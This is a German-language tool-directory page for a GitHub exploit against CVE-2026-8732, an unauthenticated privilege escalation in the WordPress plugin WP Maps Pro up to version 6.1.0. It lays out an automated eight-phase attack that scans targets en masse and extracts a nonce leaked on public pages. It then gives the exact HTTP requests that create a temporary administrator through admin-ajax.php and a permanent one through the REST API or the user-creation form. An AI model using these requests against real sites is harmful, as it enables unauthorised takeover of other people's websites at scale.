Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-8732 — Automatisierter 8-Phasen-Exploit für CVE-2026-8732, eine nicht authentifizierte Privilegieneskalation in WP Maps Pro ≤ 6.1.0. Nutzt Multiprocessing und asyncio, um Ziele zu scannen, Nonces zu extrahieren und Admin-Konten zu erstellen. | Kitploit
Tools/GitHubGitHub/zycoder0day/cve-2026-8732
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubzycoder0day/cve-2026-8732

CVE-2026-8732

Automatisierter 8-Phasen-Exploit für CVE-2026-8732, eine nicht authentifizierte Privilegieneskalation in WP Maps Pro ≤ 6.1.0. Nutzt Multiprocessing und asyncio, um Ziele zu scannen, Nonces zu extrahieren und Admin-Konten zu erstellen.

Repository anzeigen
24vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

⚔️ CVE-2026-8732

WP Maps Pro ≤ 6.1.0 — Unberechtigte Rechteausweitung ohne Authentifizierung

CVSS 9.8 CRITICAL CWE-306 Python 3.8+ License MIT

8-Phasen-Automatisierungsexploit | Multiprocessing + Asyncio | Verifizierte Admin-Erstellung


🎯 Über die Sicherheitslücke

Das WordPress-Plugin WP Maps Pro in Version ≤ 6.1.0 enthält eine Sicherheitsanfälligkeit zur Rechteausweitung ohne Authentifizierung. Angreifer ohne jegliche Anmeldeinformationen können ein Administrator-Konto erstellen und die Kontrolle über die Website übernehmen.

Die Schwachstelle resultiert aus der Funktion „Temporary Access", die für das Support-Team des Anbieters FlipperCode entwickelt wurde, jedoch ohne ausreichenden Schutz öffentlich zugänglich ist.

InformationDetail
CVECVE-2026-8732
CVSS9.8 (KRITISCH) — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
PluginWP Maps Pro (wp-google-map-gold)
AnbieterFlipperCode
Betroffene Version≤ 6.1.0
Gepatchte Version6.1.1
TypFehlende Authentifizierung für kritische Funktion (CWE-306)
AuswirkungAdmin-Erstellung ohne Authentifizierung → vollständige Kontrolle der Website
PoC-AutorXENON1337

🔥 Drei zusammenhängende Schwachstellen

┌──────────────────────────────────────────────────────────────┐
│  SCHWACHSTELLE 1 — Endpunkt ohne Authentifizierung          │
│  ▸ AJAX-Aktion mit wp_ajax_nopriv_ registriert              │
│  ▸ Jeder kann ohne Anmeldung darauf zugreifen                │
└──────────────────────┬───────────────────────────────────────┘
                       │
┌──────────────────────▼───────────────────────────────────────┐
│  SCHWACHSTELLE 2 — Nonce auf öffentlichen Seiten geleakt    │
│  ▸ Das Objekt wpgmp_local.nonce wird auf jeder Seite        │
│    eingebettet                                              │
│  ▸ Angreifer können den Nonce aus dem HTML-Quelltext        │
│    extrahieren                                              │
└──────────────────────┬───────────────────────────────────────┘
                       │
┌──────────────────────▼───────────────────────────────────────┐
│  SCHWACHSTELLE 3 — Keine Zugriffsprüfung                    │
│  ▸ Die Callback-Funktion überprüft nur den Nonce            │
│  ▸ Kein current_user_can() — keine weiteren Abwehrmaßnahmen │
└──────────────────────────────────────────────────────────────┘

⚡ Angriffskette — 8 Phasen

  ┌─────────┐   ┌──────────┐   ┌──────────┐   ┌──────────┐
  │ PHASE 1 │──▶│ PHASE 2  │──▶│ PHASE 3   │──▶│ PHASE 4  │
  │ RESOLVE │   │ CHECK WP │   │ DETECT   │   │ VERSION  │
  │ HTTPS?  │   │ wp-content│   │ PLUGIN   │   │ ≤6.1.0? │
  │ HTTP?   │   │ wp-login  │   │ wpgmp_   │   │ WAF?     │
  └─────────┘   └──────────┘   └──────────┘   └─────┬────┘
                                                      │ ANFÄLLIG
                                                      ▼
  ┌──────────────────────────────────────────────────────────┐
  │               PHASE 5 — NONCE-EXTRAKTION                 │
  │                                                          │
  │  GRUPPE A (API)       GRUPPE B (Inhalt)    GRUPPE C     │
  │  ├─ M1: REST-Seiten   ├─ M4: Sitemap XML   └─ M7: Slug  │
  │  ├─ M2: REST-Suche    ├─ M5: Homepage-Links    Brute    │
  │  └─ M3: rest_route    └─ M6: RSS/Atom-Feed   Force     │
  │                                                          │
  │  Ziel: wpgmp_local.nonce = „fc-call-nonce"               │
  └──────────────────────────┬───────────────────────────────┘
                             │ NONCE GEFUNDEN
                             ▼
  ┌──────────┐   ┌──────────┐   ┌──────────┐
  │ PHASE 6  │──▶│ PHASE 7  │──▶│ PHASE 8  │
  │ EXPLOIT  │   │ VERIFY   │   │ ADD ADMIN│
  │ POST AJAX│   │ Magic URL│   │ PERMANENT│
  │ nonce+   │   │ Cookie   │   │ REST API │
  │ check_   │   │ login    │   │ WP-Admin │
  │ temp=false│   │ check    │   │ Form     │
  └──────────┘   └──────────┘   └──────────┘
                                       │
                                       ▼
                               ✅ ADMIN ERSTELLT
                               Login: wp_xxxx / pass
                               Rolle: administrator

Details zu jeder Phase

PhaseNameFunktionAnfragen
1ResolveWähle HTTPS/HTTP parallel1
2Check WPÜberprüfe, ob das Ziel WordPress ist0
3Detect PluginPrüfe WP Maps-Indikator in 3 Ebenen0-4
4Version + WAFLese readme.txt / CSS ?ver= + erkenne WAF1
5Nonce-Extraktion7 Suchmethoden in 3 parallelen Gruppen0-150
6ExploitPOST admin-ajax.php → temporäres Admin-Konto erstellen1
7VerifikationRufe Magic-URL auf → bestätige Admin-Sitzung2
8Admin hinzufügenREST API (primär) + WP-Admin-Formular (Backup)4

🛠️ Angriffsmethoden

Methode 1: Kern-Exploit — Admin-Erstellung ohne Authentifizierung

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

action=wpgmp_temp_access_ajax
nonce=<EXTRAHIERTER_NONCE>
check_temp=false

Antwort, wenn anfällig:

{"url":"https://target.com/?wpgmp_access=abc123def456"}

Diese Magic-URL gewährt automatische Anmeldung als fc_user_XXXXX (Rolle: administrator).

Methode 2: Permanenten Admin via REST API hinzufügen

POST /wp-json/wp/v2/users HTTP/1.1
Host: target.com
X-WP-Nonce: <REST_NONCE>
Content-Type: application/json

{
  "username": "wp_xxxxxxxx",
  "email": "user@localhost",
  "password": "Str0ng!Pass#2026",
  "roles": ["administrator"]
}

Methode 3: Admin via WP-Admin-Formular hinzufügen (Backup)

POST /wp-admin/user-new.php HTTP/1.1
Host: target.com
Cookie: [admin_cookies]
Content-Type: application/x-www-form-urlencoded

user_login=wp_xxxxxxxx
email=user@localhost
pass1=Str0ng!Pass#2026
pass2=Str0ng!Pass#2026
pw_weak=1                       <-- SCHLÜSSEL: Bestätigung schwaches Passwort
role=administrator
createuser=Add New User
_wpnonce_create-user=<NONCE>

Wichtiger Hinweis: pw_weak=1 muss zwingend enthalten sein — WordPress lehnt schwache Passwörter ohne diesen Parameter ab.


📐 Architektur

CVE-2026-8732.py
│
├── 📦 NonceFinder — Nonce-Sucher mit 7 Methoden
│   ├── Gruppe A (API): M1 REST-Seiten, M2 REST-Suche, M3 rest_route
│   ├── Gruppe B (Inhalt): M4 Sitemap, M5 Homepage-Links, M6 RSS-Feed
│   └── Gruppe C (Erzwungen): M7 Slug-Brute-Force (30+ allgemeine Slugs)
│
├── ⚔️ Exploiter — Exploit-Maschine mit 8 Phasen
│   ├── resolve()           → Phase 1: Protokollauswahl
│   ├── check_wp()          → Phase 2: WordPress-Verifikation
│   ├── detect_plugin()     → Phase 3: Plugin-Erkennung + früher Nonce
│   ├── detect_version()    → Phase 4: Versionserkennung + WAF
│   ├── exploit()           → Phase 6: Kern-Exploit
│   ├── verify()            → Phase 7: Verifikation Admin-Login
│   └── add_admin()         → Phase 8: Permanenten Admin hinzufügen
│
├── 🔧 Worker Process — Multiprocessing-Arbeiterprozesse
│   ├── producer()          → Lese Domains aus mp.Queue
│   └── consumer() (N)      → Führe parallelen Scan aus
│
└── 🖥️ Scanner — Benutzeroberfläche
    ├── single()            → Einzelzielmodus (interaktiv)
    └── multi()             → Mehrzielmodus (massenhaft)

Datenfluss

Tool herunterladen